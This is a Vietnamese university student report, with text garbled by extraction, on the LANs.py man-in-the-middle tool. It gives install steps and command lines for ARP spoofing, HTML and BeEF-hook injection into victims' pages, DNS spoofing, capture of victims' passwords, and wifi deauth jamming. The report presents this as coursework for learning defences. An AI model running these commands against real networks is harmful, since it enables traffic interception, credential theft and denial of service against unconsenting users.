HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THƠNG TIN Học phần: An tồn mạng Bài báo cáo: Tìm hiểu LANs.py Giảng viên hướng dẫn: TS Đặng Minh Tuấn Sinh viên thực hiện: Phan Tuấn Anh Mã sinh viên: B18DCAT012 Hà Nội 2021 Mục Lục Danh sách hình vẽ DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT LỜI MỞ ĐẦU Khái quát LANs.py A Giới thiệu: .6 B Lịch sử hình thành: Hướng dẫn sử dụng Hướng dẫn cài đặt: Hướng dẫn sử dụng: 10 C Kịch demo 15 D Đánh giá 18 E Tài liệu tham khảo 18 Danh sách hình vẽ Hình 1: Terminal Linux Hình 2: Link GitHub .8 Hình 3: Cài đặt LANs.py thành công .8 Hình 4: Cài đặt python-nfqueue .9 Hình 5: bảng help LANs.py Hình 6: Duyệt file PCAP scapy 12 Hình 7: Chạy LANs.py 16 Hình 8: Thành công 17 DANH SÁCH CÁC THUẬT NGỮ TIẾNG ANH VÀ VIẾT TẮT Từ Thuật ngữ tiếng Anh/Giải Thuật ngữ tiếng Việt/Giải viết tắt LAN py WLAN thích Local Area Network Python Wireless Local Area Network HTML HyperText Markup Language thích Mạng cục Ngơn ngữ lập trình python Mạng cục không dây Ngôn ngữ Đánh dấu Siêu văn JS Javascript Ngôn ngữ lập trình thông dịch ột hệ thống giúp cho việc DNS Domain Main System chuyển đổi tên miền mà người dễ ghi nhớ giao thức truyền thông sử dụng để chuyển địa ARP Address Resolution Protocol từ tầng mạng (Internet layer) sang tầng liên kết liệu theo mô hình OSI giao thức hướng liệu sử dụng máy chủ nguồn đích để truyền liệu IP Internet Protocol liên mạng chuyển mạch gói Dữ liệu liên mạng IP gửi theo MITM Man-in-the-midle khối gọi gói Tấn cơng xen Injection Tool Enter Router Channel Maximum Demo Address Protocol Tiêm nhiễm, truyền nhiễm Công cụ Nút Enter Bộ định tuyến Kênh Tối đa Bản thử Địa Phương thức LỜI MỞ ĐẦU Với phát triển nhanh chóng Internet, wifi thứ thiết yếu người, nhu cầu bảo mật thông tin hệ thống ứng dụng điện tử ngày quan tâm có ý nghĩa quan trọng Vì việc nghiên cứu công cụ gián điệp mạng LAN wifi cần thiết để có phương án phịng chống, đối phó với tin tặc Bài báo cáo nhằm mục đích giới thiệu, tìm hiểu sơ công cụ LANs.py cách sử dụng, cuối đánh giá đưa cách phòng chống Khái quát LANs.py A Giới thiệu: Khái niệm  Khái niệm mạng LAN: Local Area Network (tiếng Anh, viết tắt LAN), "mạng máy tính cục bộ") hệ thống mạng dùng để kết nối máy tính phạm vi nhỏ (nhà ở, phòng làm việc, trường học, …) Các máy tính mạng LAN chia sẻ tài ngun với nhau, mà điển hình chia sẻ tập tin, máy in, máy quét số thiết bị khác Một mạng LAN tối thiểu cần có máy chủ (server), thiết bị ghép nối (Repeater, Hub, Switch, Bridge), máy tính (client), card mạng (Network Interface Card – NIC) dây cáp (cable) để kết nối máy tính lại với Trong thời đại hệ điều hành MS-DOS, máy chủ mạng LAN thường sử dụng phần mềm Novell NetWare, nhiên điều trở nên lỗi thời sau Windows NT Windows for Workgroups xuất Ngày hầu hết máy chủ sử dụng hệ điều hành Windows, tốc độ mạng LAN lên đến 10 Mbps, 100 Mbps hay chí Gbps Một hình thức khác LAN WAN (Wide Area Network), có nghĩa mạng diện rộng, dùng để nối LAN lại với (thông qua router) Một hình thức khác mạng LAN, xuất năm gần WLAN (Wireless LAN) – mạng LAN không dây  Khái niệm LANs.py: LANs.py công cụ tự động tìm người dung WLAN hoạt động nhiều sau theo dõi số họ truyền bất kì mã HTML/JS vào trang web người dùng truy cập LANs.py truyền mã độc tới router, DNS server,… theo giao thức ARP cá nhân, người dùng khác mạng khơng bị ảnh hưởng Có thể hiển thị hầu hết bits đường truyền nạn nhân Cơng cụ tự xóa dấu vết hồn thành cơng việc LANs.py làm nhiễu sóng wifi Nó có hiệu lực bán kính xấp xỉ block Nó tác động đến nhiều người sử dụng Lịch sử hình thành: Tập lệnh sử dụng hàng đợi python nfqueue-bindings bọc Twisted- IreadingDescriptor để cung cấp gói cho hàm gọi nfqueuebindings đường sử dụng để thả chuyển tiếp gói tin cụ thể Thư viện quét Python thực cơng việc phân tích cú pháp truyền gói tin Việc tiêm mã kín trò chơi xúc xắc, cố nhỏ xảy máy chủ mà nạn nhân yêu cầu liệu thực việc với cách đặc biệt hay cách thì nạn nhân khơng mở trang web họ biết họ bị công mạng Tập lệnh thiết kế để chuyển tiếp gói gửi không thành công, vì trình sử dụng, người dùng tập lệnh thấy nhiều "[!] Injected packet for www.domain.com" thấy hai tên miền bảng Beef mà trình duyệt nối vào Nếu họ kết nối vào trang đầu tiên, cần đợi họ duyệt vài trang khác Một mục tiêu tập lệnh không bị phát B Hướng dẫn sử dụng Hướng dẫn cài đặt: Chuẩn bị kali linux: Kali Linux công cụ thường dùng để hack mạng WPA WPA2.Tiến hành cài đặt (tập tin ISO) Kali Linux cách tải phiên Kali cần sử dụng trang web kali.org Cài đặt LANs.py Trước sử dụng LANs.py, ta cần phải có công cụ: Python >v2.7 Python-nfqueue Python nfqueue-bindings 0.4.3+ Aircrack-ng Python-scapy Nbtscan Nmap Python-twisted* Beef (tùy chọn) Khi đầy đủ công cụ, tiến hành cài LANs.py Bước 1: Mở Terminal Hình 1: Terminal Linux Bước 2: Truy cập link: https://github.com/DanMcInerney/LANs.py Hình 2: Link GitHub Bước 3: Gõ lệnh git clone https://github.com/DanMcInerney/LANs.py.git Hình 3: Cài đặt LANs.py thành công Bước 4: Trỏ tới thư mục LANs.py gõ lệnh python Lans.py, thêm “–h” để bảng help (nếu kali chưa có python-nfqueue thì hệ thống yêu cầu cài đặt ta cần ấn “y” enter Hình 4: Cài đặt python-nfqueue 10 Hình 5: bảng help LANs.py Hướng dẫn sử dụng: a Tất lệnh: Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [ packets PACKETS] [ directedonly] [ accesspoint ACCESSPOINT] b HTML injection:  Lệnh: python LANs.py –u –p –d –ip (Địa công) 11 -d: mở giao diện dòng lệnh đẻ hiển thị tất ảnh mà nạn nhân xem  Lệnh: python LANs.py -b http://192.168.0.5:3000/hook.js Truyền vào trang web nạn nhân xem URL Lệnh để vào địa file javascript Cố gắng truyền URL trước tag đươcẹ tìm thấy page HTML  Lệnh: python LANs.py -c 'Owned.' Truyền HTML vào trang web nạn nhân truy cập Đầu tiên tool cố truyền lệnh vào trước thẻ xuất c Đọc từ PCAP: Để đọc từ file PCAP ta phải có địa mục tiêu tùy chọn ip Nó phải dạng thư viện PCAP (libpcap) Một lợi ích việc đọc từ file PCAP ta không cần phải root để thực thi đoạn script  Lệnh: python LANs.py -pcap libpcapfilename -ip 192.168.0.10 LANs.py sử dụng scapy để đọc file PCAP 12 Hình 6: Duyệt file PCAP scapy DNS spoofing:  Lệnh 1: python LANs.py -a -r 80.87.128.67  Lệnh 2: python LANs.py -dns eff.org Ví dụ 1: “-a” tùy chọn giả mạo lời gọi DNS từ nạn nhân sử dụng câu lệnh với –r thì chuyển hướng nạn nhân sang địa –r, cụ thể địa 80.87.128.67 (stallman.org) mà không cần biết nạn nhân ghi gì vào địa Ví dụ 2: Lệnh giả mạo tên miền eff.org tên miền phụ eff.org Khi đối số lên với tùy chọn –a –dns, đoạn mã tự động gửi nạn nhân tới địa kẻ công Nếu nạn nhân cố gắng truy cập eff.org thì họ bị chuyển hướng tới IP kẻ công 13 d Câu lệnh thường dùng:  -b BEEF_HOOK_URL: chép BeEF hook URL để tiêm nhiễm vào url nạn nhân truy cập  -c ‘HTML CODE’: Tiêm nhiễm mã độc HTML vào trang web nạn nhân truy cập  -d: mở trình giả lập đầu cuối với driffnet để hiển thị toàn ảnh nạn nhân xem  -dns DOMAIN: giả mạo DNS DOMAIN ví dụ –dns facebook.com giả mạo lời gọi DNS từ facebook.com tên miền phụ.facebook.com  -a: giả mạo phản hồi DNS mà người dùng tạo Tạo trang cổng thông tin cố định hiệu  -r IPADDRESS: dùng với –dns DOMAIN, điều hướng người dùng tới IPADDRESS họ truy cập tên miền  -u: in URLs mà người dùng truy cập, cắt bớt tới 150 ký tự lớp image/css/js/woff/svg url từ họ cố gắn gửi yêu cầu thứ không thiết thực  -i INTERFACE: định giao diện, đưa lập trình ban đầu ip route, ví dụ -I wlan0  -ip: mục tiêu địa IP  -n: hiển thị quét nmap công trang đầu tới [địa IP mục tiêu]/nmap.txt  -p: in username/password cho FTP/IMAP/POP/IRC/HTTP, HTTP POST, tất thứ người dùng tìm kiếm mạng, thư đến thư đi, tin nhắn IRC gửi nhận 14  -pcap PCAP_FILE: phân tích cú pháp thơng qua tất gói tin thư mục PCAP, yêu cầu phải có –ip[địa IP mục tiêu]  -rmac ROUTER_MAC: tới router MAC, ta có vấn đề gì thì tool tự động giải  -rip ROUTER_IP: tới router IP tác dụng  -v: hiển thị URL dài dịng, mà khơng rút gọi 150 ký tự –u e Wifi Jamming:  -s MAC_Address_to_skip: đinh địa MAC để bỏ qua deauthing Ví dụ: -s 00:11:BB:33:44:AA  -ch CHANNEL: giới hạn wifijammer tới channel định  -m MAXIMUM: tối đa số lượng client tới deauth  -no: khơng xóa danh sách deauth số client tối đa truy cập Phải dùng liên kết với –m Ví dụ -m 10 –n  -t TIME_INTERVAL: thời gian gói deauth Mặc định tối đa Nếu ta thấy lỗi scapy ‘no buffer space’, thử -t 00001  packets NUMBER: số lượng gói tin để gửi deauth burst Mặc đinh gói  directedonly: Khơng gửi gói tin deauth tới địa phát tin Aps gửi cho cặp client/ap  accesspoint ROUTER_MAC: Đi tới địa MAC mục tiêu AP định f Dọn dẹp: Khi ấn Ctrl-C: 15  Tắt gửi IP  Xả tường lửa iptables  Khôi phục định tuyến bảng ARP nạn nhân C Kịch demo Demo Address Protocol resolution spoofing: Hình 7: Chạy LANs.py Gõ lệnh python LANs.py –u –p – d –ip 192.168.1.34 16 Hình 8: Thành công 17 D Đánh giá LANs.py công cụ mạnh mẽ để tiêm nhiễm mã độc, công không dây xem trộm hình người dùng wifi Tác giả khơng cịn hỗ trợ công cụ mà gợi ý Bettercap thay cho ARP MITM 18 E Tài liệu tham khảo https://github.com/DanMcInerney/LANs.py https://en.kali.tools/?p=388 https://cybershafarat.com/2021/07/25/lans-py-tool/ https://www.reddit.com/r/netsec/comments/1q6zmi/screenshots_lanspy_cat ch_usernames_passwords_and/ https://www.youtube.com/watch?v=dhT9IzcaGlQ https://www.youtube.com/watch?v=TP-VVr6ETRU 19 LỜI CẢM ƠN “Đầu tiên, em xin gửi lời cảm ơn chân thành đến Học viện Cơng nghệ Bưu Viễn thơng đưa mơn mơn học An tồn mạng vào chương trình giảng dạy Đặc biệt, em xin gửi lời cảm ơn sâu sắc đến giảng viên môn - thầy Đặng Minh Tuấn dạy dỗ, truyền đạt kiến thức quý báu suốt thời gian học tập vừa qua Trong thời gian tham gia lớp học An toàn mạng thầy, em có thêm cho mình nhiều kiến thức bổ ích, tinh thần học tập hiệu quả, nghiêm túc Đây chắn kiến thức quý báu, hành trang để em vững bước sau Do vốn kiến thức nhiều hạn chế, khả tiếp thu thực tế nhiều bỡ ngỡ, em cố gắng chắn tiểu luận khó tránh khỏi thiếu sót nhiều chỗ cịn chưa xác, kính mong thầy xem xét đóng góp để tiểu luận em hoàn thiện Em xin chân thành cảm ơn!” 20 ... hình thức khác LAN WAN (Wide Area Network), có nghĩa mạng diện rộng, dùng để nối LAN lại với (thông qua router) Một hình thức khác mạng LAN, xuất năm gần WLAN (Wireless LAN) – mạng LAN không dây... mơn học An toàn mạng vào chương trình giảng dạy Đặc biệt, em xin gửi lời cảm ơn sâu sắc đến giảng viên môn - thầy Đặng Minh Tuấn dạy dỗ, truyền đạt kiến thức quý báu suốt thời gian học tập vừa... qua Trong thời gian tham gia lớp học An tồn mạng thầy, em có thêm cho mình nhiều kiến thức bổ ích, tinh thần học tập hiệu quả, nghiêm túc Đây chắn kiến thức quý báu, hành trang để em vững bước